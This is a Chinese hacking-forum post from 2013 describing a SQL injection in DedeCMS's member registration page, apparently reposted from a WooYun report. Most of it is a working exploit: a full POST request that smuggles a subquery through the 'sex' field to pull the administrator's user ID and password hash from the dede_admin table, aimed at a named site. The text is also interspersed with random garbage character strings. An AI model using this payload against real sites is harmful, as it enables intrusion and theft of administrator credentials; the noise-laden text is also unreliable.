找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2088|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞8 \# {: \9 E! r7 i* W1 t
简要描述:
2 G$ Y& G; r7 l% ]
. r# n- K) T7 L) q: U需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.8 ~, i) b4 X6 B" F) a
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
/ L/ {' R2 h+ b详细说明:跟这个漏洞
6 P+ k. S: c4 w0 Y
+ v1 V: [: \* QWooYun: Dedecms SQL注射导致审核机制绕过漏洞
8 _5 h6 w0 M0 p% x' J5 ^是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的./ O5 n' Q; p$ ]/ d& d" q9 M. g2 W( I
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
  Q" f; J$ b3 O) G8 G7 _0 b% T + J. r4 _# D& ?& T
www.political-security.com/member/reg_new.php/ g  l" }+ A. A- y

! \% h1 w$ u  [" m5 e* {: PPOST
8 A! r9 a3 V1 t
' r2 [" L. s- e9 I" q; h+ sdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
& _# M) t" p+ H: e5 _9 O/ vuserid=c4rp3nt3r&uname=c4rp3nt3r
8 ]7 g/ V4 @* y&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss% `$ w/ }7 G5 H- q5 y6 @
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,9 @" X" ]( C" S; Y/ O
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');+ V( C$ a" n& x7 u* a' A
%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表